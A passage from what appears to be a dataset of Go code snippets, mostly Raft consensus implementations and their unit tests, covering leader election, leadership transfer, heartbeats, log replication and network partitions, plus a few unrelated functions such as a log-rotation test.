lid))\r\n\t\ttime.Sleep(4*time.Second)\t\t\t\r\n\t\trunning[lid] = false\r\n\t\tfor i := 1; i<= 5;i++{\r\n\t\t\tif running[i] {\r\n\t\t\t\trafts[i-1].Append([]byte(\"first\"))\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\ttime.Sleep(5*time.Second)\t\t\t\r\n\r\n\tfor idx, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tif running[idx-1]{\r\n\t\t\tnode.Shutdown()\r\n\t\t}\r\n\t}\r\n}", "func TestRaftNewLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftNewLeader\"\n\n\t// Create n1 node.\n\tstorage := NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm1 := newTestFSM(ID1)\n\t// NOTE we use different cluster ID for nodes within same cluster to avoid\n\t// registering same metric path twice. This should never happen in real world\n\t// because we'll never run nodes of a same cluster within one process.\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), storage)\n\t// Create n2 node.\n\tstorage = NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), storage)\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Wait until a leader is elected.\n\tselect {\n\tcase <-fsm1.leaderCh:\n\tcase <-fsm2.leaderCh:\n\t}\n}", "func (rf *Raft) initRaftNodeToFollower(logCapacity int) {\n rf.mu.Lock()\n defer rf.mu.Unlock()\n\n rf.state = \"Follower\"\n\n rf.currentTerm = 0\n rf.votedFor = -1\n rf.log = make([]Entry, 1, logCapacity)\n rf.log[0].Term = 0\n\n rf.commitIndex = 0\n rf.lastApplied = 0\n\n rf.electionTime = generateElectionTime()\n rf.electionTimer = time.NewTimer(time.Duration(rf.electionTime) * time.Millisecond)\n\n rf.nextIndex = make([]int, len(rf.peers))\n rf.matchIndex = make([]int, len(rf.peers))\n for i:=0; i<len(rf.peers); i++ {\n rf.nextIndex[i] = len(rf.log)\n rf.matchIndex[i] = 0\n }\n\n rf.snapshottedIndex = 0\n}", "func TestTrackRotatedFilesLogOrder(t *testing.T) {\n\tif runtime.GOOS == windowsOS {\n\t\tt.Skip(\"Moving files while open is unsupported on Windows\")\n\t}\n\tt.Parallel()\n\n\ttempDir := t.TempDir()\n\tcfg := NewConfig().includeDir(tempDir)\n\tcfg.StartAt = \"beginning\"\n\toperator, emitCalls := buildTestManager(t, cfg)\n\n\toriginalFile := openTemp(t, tempDir)\n\torginalName := originalFile.Name()\n\twriteString(t, originalFile, \"testlog1\\n\")\n\n\trequire.NoError(t, operator.Start(testutil.NewMockPersister(\"test\")))\n\tdefer func() {\n\t\trequire.NoError(t, operator.Stop())\n\t}()\n\n\twaitForToken(t, emitCalls, []byte(\"testlog1\"))\n\twriteString(t, originalFile, \"testlog2\\n\")\n\toriginalFile.Close()\n\n\tnewDir := fmt.Sprintf(\"%s%s\", tempDir[:len(tempDir)-1], \"_new/\")\n\terr := os.Mkdir(newDir, 0777)\n\trequire.NoError(t, err)\n\tmovedFileName := fmt.Sprintf(\"%s%s\", newDir, \"newfile.log\")\n\n\terr = os.Rename(orginalName, movedFileName)\n\trequire.NoError(t, err)\n\n\tnewFile, err := os.OpenFile(orginalName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)\n\trequire.NoError(t, err)\n\twriteString(t, newFile, \"testlog3\\n\")\n\n\twaitForTokens(t, emitCalls, [][]byte{[]byte(\"testlog2\"), []byte(\"testlog3\")})\n}", "func TestLeaderTransferBack(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\t// Transfer leadership back to self.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestLeaderTransferSecondTransferToSameNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\tfor i := 0; i < lead.heartbeatTimeout; i++ {\n\t\tlead.tick()\n\t}\n\t// Second transfer leadership request to the same node.\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\n\tfor i := 0; i < lead.electionTimeout-lead.heartbeatTimeout; i++ {\n\t\tlead.tick()\n\t}\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func Follow(r cruntime.Manager, bs bootstrapper.Bootstrapper, cfg config.ClusterConfig, cr logRunner, logOutput io.Writer) error {\n\tcs := []string{}\n\tfor _, v := range logCommands(r, bs, cfg, 0, true) {\n\t\tcs = append(cs, v+\" &\")\n\t}\n\tcs = append(cs, \"wait\")\n\n\tcmd := exec.Command(\"/bin/bash\", \"-c\", strings.Join(cs, \" \"))\n\tcmd.Stdout = logOutput\n\tcmd.Stderr = logOutput\n\tif _, err := cr.RunCmd(cmd); err != nil {\n\t\treturn errors.Wrapf(err, \"log follow\")\n\t}\n\treturn nil\n}", "func TestFollowerCheckMsgApp(t *testing.T) {\n\tents := []pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}}\n\ttests := []struct {\n\t\tterm uint64\n\t\tindex uint64\n\t\twindex uint64\n\t\twreject bool\n\t\twrejectHint uint64\n\t}{\n\t\t// match with committed entries\n\t\t{0, 0, 1, false, 0},\n\t\t{ents[0].Term, ents[0].Index, 1, false, 0},\n\t\t// match with uncommitted entries\n\t\t{ents[1].Term, ents[1].Index, 2, false, 0},\n\n\t\t// unmatch with existing entry\n\t\t{ents[0].Term, ents[1].Index, ents[1].Index, true, 2},\n\t\t// unexisting entry\n\t\t{ents[1].Term + 1, ents[1].Index + 1, ents[1].Index + 1, true, 2},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append(ents)\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Commit: 1})\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, FromGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tType: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\t\tType: pb.MsgAppResp, Term: 2, Index: tt.windex, Reject: tt.wreject, RejectHint: tt.wrejectHint},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %+v, want %+v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func TestRaftRemoveLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftRemoveLeader\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\t// Create n3.\n\tfsm3 := newTestFSM(ID3)\n\tn3 := testCreateRaftNode(getTestConfig(ID3, clusterPrefix+ID3), newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes to leader.\n\t<-fsm1.leaderCh\n\n\t// Add n2 to the cluster.\n\tpending := n1.AddNode(ID2)\n\tn2.Start(fsm2)\n\t// Wait until n2 gets joined.\n\t<-pending.Done\n\n\t// Add n3 to the cluster.\n\tpending = n1.AddNode(ID3)\n\tn3.Start(fsm3)\n\t// Wait until n3 gets joined.\n\t<-pending.Done\n\n\t// Now we have a cluster with 3 nodes and n1 as the leader.\n\n\t// Remove the leader itself.\n\tn1.RemoveNode(ID1)\n\n\t// A new leader should be elected in new configuration(n2, n3).\n\tvar newLeader *Raft\n\tselect {\n\tcase <-fsm2.leaderCh:\n\t\tnewLeader = n2\n\tcase <-fsm3.leaderCh:\n\t\tnewLeader = n1\n\t}\n\n\tnewLeader.Propose([]byte(\"data1\"))\n\tnewLeader.Propose([]byte(\"data2\"))\n\tnewLeader.Propose([]byte(\"data3\"))\n\n\t// Now n2 and n3 should commit newly proposed entries eventually>\n\tif !testEntriesEqual(fsm2.appliedCh, fsm3.appliedCh, 3) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func TestLeaderBcastBeat(t *testing.T) {\n\t// heartbeat interval\n\thi := 1\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, hi, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tfor i := 0; i < 10; i++ {\n\t\tr.appendEntry(pb.Entry{Index: uint64(i) + 1})\n\t}\n\n\tfor i := 0; i < hi; i++ {\n\t\tr.tick()\n\t}\n\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTerm: 1, Type: pb.MsgHeartbeat},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3},\n\t\t\tTerm: 1, Type: pb.MsgHeartbeat},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %v, want %v\", msgs, wmsgs)\n\t}\n}", "func (r *Raft) runLeader() {\n\tstate := leaderState{\n\t\tcommitCh: make(chan *DeferLog, 128),\n\t\treplicationState: make(map[string]*followerReplication),\n\t}\n\tdefer state.Release()\n\n\t// Initialize inflight tracker\n\tstate.inflight = NewInflight(state.commitCh)\n\n\tr.peerLock.Lock()\n\t// Start a replication routine for each peer\n\tfor _, peer := range r.peers {\n\t\tr.startReplication(&state, peer)\n\t}\n\tr.peerLock.Unlock()\n\n\t// seal leadership\n\tgo r.leaderNoop()\n\n\ttransition := false\n\tfor !transition {\n\t\tselect {\n\t\tcase applyLog := <-r.applyCh:\n\t\t\t// Prepare log\n\t\t\tapplyLog.log.Index = r.getLastLogIndex() + 1\n\t\t\tapplyLog.log.Term = r.getCurrentTerm()\n\t\t\t// Write the log entry locally\n\t\t\tif err := r.logs.StoreLog(&applyLog.log); err != nil {\n\t\t\t\tr.logE.Printf(\"Failed to commit log: %w\", err)\n\t\t\t\tapplyLog.response = err\n\t\t\t\tapplyLog.Response()\n\t\t\t\tr.setState(Follower)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Add this to the inflight logs\n\t\t\tstate.inflight.Start(applyLog, r.quorumSize())\n\t\t\tstate.inflight.Commit(applyLog.log.Index)\n\t\t\t// Update the last log since it's on disk now\n\t\t\tr.setLastLogIndex(applyLog.log.Index)\n\n\t\t\t// Notify the replicators of the new log\n\t\t\tfor _, f := range state.replicationState {\n\t\t\t\tasyncNotifyCh(f.triggerCh)\n\t\t\t}\n\n\t\tcase commitLog := <-state.commitCh:\n\t\t\t// Increment the commit index\n\t\t\tidx := commitLog.log.Index\n\t\t\tr.setCommitIndex(idx)\n\n\t\t\t// Perform leader-specific processing\n\t\t\ttransition = r.leaderProcessLog(&state, &commitLog.log)\n\n\t\t\t// Trigger applying logs locally\n\t\t\tr.commitCh <- commitTuple{idx, commitLog}\n\n\t\tcase rpc := <-r.rpcCh:\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\ttransition = r.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\ttransition = r.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"Leader state, got unexpected command: %#v\",\n\t\t\t\t\trpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func TestSubscribeStreamNotLeader(t *testing.T) {\n\tdefer cleanupStorage(t)\n\n\t// Use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\t// Configure first server.\n\ts1Config := getTestConfig(\"a\", true, 5050)\n\ts1 := runServerWithConfig(t, s1Config)\n\tdefer s1.Stop()\n\n\t// Configure second server.\n\ts2Config := getTestConfig(\"b\", false, 5051)\n\ts2 := runServerWithConfig(t, s2Config)\n\tdefer s2.Stop()\n\n\tgetMetadataLeader(t, 10*time.Second, s1, s2)\n\n\t// Create the stream.\n\tclient, err := lift.Connect([]string{\"localhost:5050\"})\n\trequire.NoError(t, err)\n\tdefer client.Close()\n\n\tname := \"foo\"\n\tsubject := \"foo\"\n\terr = client.CreateStream(context.Background(), subject, name,\n\t\tlift.ReplicationFactor(2))\n\trequire.NoError(t, err)\n\n\trequire.NoError(t, client.Close())\n\n\t// Wait for both nodes to create stream.\n\twaitForPartition(t, 5*time.Second, name, 0, s1, s2)\n\n\t// Connect to the server that is the stream follower.\n\tleader := getPartitionLeader(t, 10*time.Second, name, 0, s1, s2)\n\tvar followerConfig *Config\n\tif leader == s1 {\n\t\tfollowerConfig = s2Config\n\t} else {\n\t\tfollowerConfig = s1Config\n\t}\n\tconn, err := grpc.Dial(fmt.Sprintf(\"localhost:%d\", followerConfig.Port), grpc.WithInsecure())\n\trequire.NoError(t, err)\n\tdefer conn.Close()\n\tapiClient := proto.NewAPIClient(conn)\n\n\t// Subscribe on the follower.\n\tstream, err := apiClient.Subscribe(context.Background(), &proto.SubscribeRequest{Stream: name})\n\trequire.NoError(t, err)\n\t_, err = stream.Recv()\n\trequire.Error(t, err)\n\trequire.Contains(t, err.Error(), \"Server not partition leader\")\n}", "func TestBcastBeat(t *testing.T) {\n\toffset := uint64(1000)\n\t// make a state machine with log.offset = 1000\n\tpeerGrps := make([]*pb.Group, 0)\n\tfor _, pid := range []uint64{1, 2, 3} {\n\t\tgrp := pb.Group{\n\t\t\tNodeId: pid,\n\t\t\tRaftReplicaId: pid,\n\t\t\tGroupId: 1,\n\t\t}\n\t\tpeerGrps = append(peerGrps, &grp)\n\t}\n\n\ts := pb.Snapshot{\n\t\tMetadata: pb.SnapshotMetadata{\n\t\t\tIndex: offset,\n\t\t\tTerm: 1,\n\t\t\tConfState: pb.ConfState{Nodes: []uint64{1, 2, 3}, Groups: peerGrps},\n\t\t},\n\t}\n\tstorage := NewMemoryStorage()\n\tstorage.ApplySnapshot(s)\n\tsm := newTestRaft(1, nil, 10, 1, storage)\n\tdefer closeAndFreeRaft(sm)\n\tsm.Term = 1\n\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\tfor i := 0; i < 10; i++ {\n\t\tsm.appendEntry(pb.Entry{Index: uint64(i) + 1})\n\t}\n\t// slow follower\n\tsm.prs[2].Match, sm.prs[2].Next = 5, 6\n\t// normal follower\n\tsm.prs[3].Match, sm.prs[3].Next = sm.raftLog.lastIndex(), sm.raftLog.lastIndex()+1\n\n\tsm.Step(pb.Message{Type: pb.MsgBeat})\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 2 {\n\t\tt.Fatalf(\"len(msgs) = %v, want 2\", len(msgs))\n\t}\n\twantCommitMap := map[uint64]uint64{\n\t\t2: min(sm.raftLog.committed, sm.prs[2].Match),\n\t\t3: min(sm.raftLog.committed, sm.prs[3].Match),\n\t}\n\tfor i, m := range msgs {\n\t\tif m.Type != pb.MsgHeartbeat {\n\t\t\tt.Fatalf(\"#%d: type = %v, want = %v\", i, m.Type, pb.MsgHeartbeat)\n\t\t}\n\t\tif m.Index != 0 {\n\t\t\tt.Fatalf(\"#%d: prevIndex = %d, want %d\", i, m.Index, 0)\n\t\t}\n\t\tif m.LogTerm != 0 {\n\t\t\tt.Fatalf(\"#%d: prevTerm = %d, want %d\", i, m.LogTerm, 0)\n\t\t}\n\t\tif wantCommitMap[m.To] == 0 {\n\t\t\tt.Fatalf(\"#%d: unexpected to %d\", i, m.To)\n\t\t} else {\n\t\t\tif m.Commit != wantCommitMap[m.To] {\n\t\t\t\tt.Fatalf(\"#%d: commit = %d, want %d\", i, m.Commit, wantCommitMap[m.To])\n\t\t\t}\n\t\t\tdelete(wantCommitMap, m.To)\n\t\t}\n\t\tif len(m.Entries) != 0 {\n\t\t\tt.Fatalf(\"#%d: len(entries) = %d, want 0\", i, len(m.Entries))\n\t\t}\n\t}\n}", "func (s *raftServer) handleFollowers(followers []int, nextIndex *utils.SyncIntIntMap, matchIndex *utils.SyncIntIntMap, aeToken *utils.SyncIntIntMap) {\n\tfor s.State() == LEADER {\n\t\tfor _, f := range followers {\n\t\t\tlastIndex := s.localLog.TailIndex()\n\t\t\tn, ok := nextIndex.Get(f)\n\t\t\tif !ok {\n\t\t\t\tpanic(\"nextIndex not found for follower \" + strconv.Itoa(f))\n\t\t\t}\n\n\t\t\tunlocked, ok := aeToken.Get(f)\n\n\t\t\tif !ok {\n\t\t\t\tpanic(\"aeToken not found for follower \" + strconv.Itoa(f))\n\t\t\t}\n\n\t\t\tif lastIndex != 0 && lastIndex >= n && unlocked == 1 {\n\t\t\t\taeToken.Set(f, 0)\n\t\t\t\t// send a new AppendEntry\n\t\t\t\tprevIndex := n - 1\n\t\t\t\tvar prevTerm int64 = 0\n\t\t\t\t// n = 0 when we add first entry to the log\n\t\t\t\tif prevIndex > 0 {\n\t\t\t\t\tprevTerm = s.localLog.Get(prevIndex).Term\n\t\t\t\t}\n\t\t\t\tae := &AppendEntry{Term: s.Term(), LeaderId: s.server.Pid(), PrevLogIndex: prevIndex, PrevLogTerm: prevTerm}\n\t\t\t\tae.LeaderCommit = s.commitIndex.Get()\n\t\t\t\tae.Entry = *s.localLog.Get(n)\n\t\t\t\ts.writeToLog(\"Replicating entry \" + strconv.FormatInt(n, 10))\n\t\t\t\ts.server.Outbox() <- &cluster.Envelope{Pid: f, Msg: ae}\n\t\t\t}\n\t\t}\n\t\ttime.Sleep(NICE * time.Millisecond)\n\t}\n}", "func (rf *Raft) StartAppendLog() {\n\tvar count int32 = 1\n\tfor i, _ := range rf.peers {\n\t\tif i == rf.me {\n\t\t\tcontinue\n\t\t}\n\t\tgo func(i int) {\n\t\t\tfor{\n\t\t\t\trf.mu.Lock()\n\t\t\t\t//fmt.Printf(\"follower %d lastlogindex: %v, nextIndex: %v\\n\",i, rf.GetPrevLogIndex(i), rf.nextIndex[i])\n\t\t\t\t//fmt.Print(\"sending log entries from leader %d to peer %d for term %d\\n\", rf.me, i, rf.currentTerm)\n\t\t\t\t//fmt.Print(\"nextIndex:%d\\n\", rf.nextIndex[i])\n\t\t\t\tif rf.state != Leader {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\targs := AppendEntriesArgs{\n\t\t\t\t\tTerm: rf.currentTerm,\n\t\t\t\t\tLeaderId: rf.me,\n\t\t\t\t\tPrevLogIndex: rf.GetPrevLogIndex(i),\n\t\t\t\t\tPrevLogTerm: rf.GetPrevLogTerm(i),\n\t\t\t\t\tEntries: append(make([]LogEntry, 0), rf.logEntries[rf.nextIndex[i]:]...),\n\t\t\t\t\tLeaderCommit: rf.commitIndex,\n\t\t\t\t}\n\t\t\t\treply := AppendEntriesReply{}\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tok := rf.sendAppendEntries(i, &args, &reply)\n\n\t\t\t\tif !ok {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\trf.mu.Lock()\n\t\t\t\tif rf.state != Leader {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif reply.Term > rf.currentTerm {\n\t\t\t\t\trf.BeFollower(reply.Term)\n\t\t\t\t\tgo func() {\n\t\t\t\t\t\tsend(rf.appendEntry)\n\t\t\t\t\t}()\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif reply.Success {\n\t\t\t\t\trf.matchIndex[i] = args.PrevLogIndex + len(args.Entries)\n\t\t\t\t\trf.nextIndex[i] = rf.matchIndex[i] + 1\n\t\t\t\t\t//fmt.Print(\"leader: %v, for peer %v, match index: %d, next index: %d, peers: %d\\n\", rf.me, i, rf.matchIndex[i], rf.nextIndex[i], len(rf.peers))\n\t\t\t\t\tatomic.AddInt32(&count, 1)\n\t\t\t\t\tif atomic.LoadInt32(&count) > int32(len(rf.peers)/2) {\n\t\t\t\t\t\t//fmt.Print(\"leader %d reach agreement\\n, args.prevlogindex:%d, len:%d\\n\", rf.me, args.PrevLogIndex, len(args.Entries))\n\t\t\t\t\t\trf.UpdateCommitIndex()\n\t\t\t\t\t}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t} else {\n\t\t\t\t\t//fmt.Printf(\"peer %d reset the next index from %d to %d\\n\", i, rf.nextIndex[i], rf.nextIndex[i]-1)\n\t\t\t\t\tif rf.nextIndex[i] > 0 {\n\t\t\t\t\t\trf.nextIndex[i]--\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t} else {\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t\t}\n\t\t}(i)\n\t}\n\n}", "func TestLeaderTransferSecondTransferToAnotherNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(3)\n\n\tlead := nt.peers[1].(*raft)\n\n\tnt.send(pb.Message{From: 3, To: 1, Type: pb.MsgTransferLeader})\n\tif lead.leadTransferee != 3 {\n\t\tt.Fatalf(\"wait transferring, leadTransferee = %v, want %v\", lead.leadTransferee, 3)\n\t}\n\n\t// Transfer leadership to another node.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n}", "func TestRaftSynchronization(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\t// Configuration entry, used by the cluster to find its configuration.\n\tconfEntry := newConfEntry(1, 1, []string{ID1, ID2}, 54321)\n\n\ttests := []struct {\n\t\t// Entries in n1's log.\n\t\tn1Log []Entry\n\t\t// Entries in n2's log.\n\t\tn2Log []Entry\n\t\t// term of n1\n\t\tn1term uint64\n\t\t// term of n2\n\t\tn2term uint64\n\t\t// number of entries will be applied\n\t\tnApplied int\n\t}{\n\n\t\t// NOTE: entry (1, 1) will be the configuration.\n\n\t\t// n1: (1, 1), (1, 2)\n\t\t// n2: (1, 1), (1, 2)\n\t\t// applied: (1, 2)\n\t\t{\n\t\t\t[]Entry{confEntry, newEntry(1, 2)},\n\t\t\t[]Entry{confEntry, newEntry(1, 2)},\n\t\t\t1,\n\t\t\t1,\n\t\t\t1,\n\t\t},\n\n\t\t// n1: (1, 1), (1, 2), (1, 3)\n\t\t// n2: (1, 1), (1, 2)\n\t\t// applied: (1, 2), (1, 3)\n\t\t{\n\t\t\t[]Entry{confEntry, newEntry(1, 2), newEntry(1, 3)},\n\t\t\t[]Entry{confEntry, newEntry(1, 2)},\n\t\t\t1,\n\t\t\t1,\n\t\t\t2,\n\t\t},\n\n\t\t// n1: (1, 1),\n\t\t// n2: (1, 1), (1, 2)\n\t\t// applied: (1, 2)\n\t\t{\n\t\t\t[]Entry{confEntry},\n\t\t\t[]Entry{confEntry, newEntry(1, 2)},\n\t\t\t1,\n\t\t\t1,\n\t\t\t1,\n\t\t},\n\n\t\t// n1: (1, 1), (1, 2), (1, 3)\n\t\t// n2: (1, 1), (2, 2)\n\t\t// applied: (2, 2)\n\t\t{\n\t\t\t[]Entry{confEntry, newEntry(1, 2), newEntry(1, 3)},\n\t\t\t[]Entry{confEntry, newEntry(2, 2)},\n\t\t\t1,\n\t\t\t2,\n\t\t\t1,\n\t\t},\n\t}\n\n\tfor i, test := range tests {\n\t\tt.Log(\"running test:\", test)\n\t\tclusterPrefix := fmt.Sprintf(\"TestRaftSynchronization_%d\", i)\n\n\t\t// Create n1 node.\n\t\tstorage := NewStorage(NewMemSnapshotMgr(), initLog(test.n1Log...), NewMemState(test.n1term))\n\t\tfsm1 := newTestFSM(ID1)\n\t\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), storage)\n\t\t// Create n2 node.\n\t\tstorage = NewStorage(NewMemSnapshotMgr(), initLog(test.n2Log...), NewMemState(test.n2term))\n\t\tfsm2 := newTestFSM(ID2)\n\t\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), storage)\n\t\tconnectAllNodes(n1, n2)\n\t\tn1.Start(fsm1)\n\t\tn2.Start(fsm2)\n\n\t\t// Two FSMs should have applied same sequence of commands.\n\t\tif !testEntriesEqual(fsm1.appliedCh, fsm2.appliedCh, test.nApplied) {\n\t\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t\t}\n\t}\n}", "func TestPartition(t *testing.T) {\n\traftConf := &RaftConfig{MemberRegSocket: \"127.0.0.1:8124\", PeerSocket: \"127.0.0.1:9987\", TimeoutInMillis: 1500, HbTimeoutInMillis: 150, LogDirectoryPath: \"logs1\", StableStoreDirectoryPath: \"./stable1\", RaftLogDirectoryPath: \"../LocalLog1\"}\n\n\t// delete stored state to avoid unnecessary effect on following test cases\n\tinitState(raftConf.StableStoreDirectoryPath, raftConf.LogDirectoryPath, raftConf.RaftLogDirectoryPath)\n\n\t// launch cluster proxy servers\n\tcluster.NewProxyWithConfig(RaftToClusterConf(raftConf))\n\n\tfmt.Println(\"Started Proxy\")\n\n\ttime.Sleep(100 * time.Millisecond)\n\n\tserverCount := 5\n\traftServers := make([]raft.Raft, serverCount+1)\n\tpseudoClusters := make([]*test.PseudoCluster, serverCount+1)\n\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\t// create cluster.Server\n\t\tclusterServer, err := cluster.NewWithConfig(i, \"127.0.0.1\", 8500+i, RaftToClusterConf(raftConf))\n\t\tpseudoCluster := test.NewPseudoCluster(clusterServer)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating cluster server. \" + err.Error())\n\t\t\treturn\n\t\t}\n\n\t\tlogStore, err := llog.Create(raftConf.RaftLogDirectoryPath + \"/\" + strconv.Itoa(i))\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating log. \" + err.Error())\n\t\t\treturn\n\t\t}\n\n\t\ts, err := NewWithConfig(pseudoCluster, logStore, raftConf)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating Raft servers. \" + err.Error())\n\t\t\treturn\n\t\t}\n\t\traftServers[i] = s\n\t\tpseudoClusters[i] = pseudoCluster\n\t}\n\n\t// wait for leader to be elected\n\ttime.Sleep(20 * time.Second)\n\tcount := 0\n\toldLeader := 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tif raftServers[i].Leader() == raftServers[i].Pid() {\n\t\t\toldLeader = i\n\t\t\tcount++\n\t\t}\n\t}\n\tif count != 1 {\n\t\tt.Errorf(\"No leader was chosen in 1 minute\")\n\t\treturn\n\t}\n\n\t// isolate Leader and any one follower\n\tfollower := 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tif i != oldLeader {\n\t\t\tfollower = i\n\t\t\tbreak\n\t\t}\n\t}\n\tfmt.Println(\"Server \" + strconv.Itoa(follower) + \" was chosen as follower in minority partition\")\n\tfor i := 1; i <= serverCount; i += 1 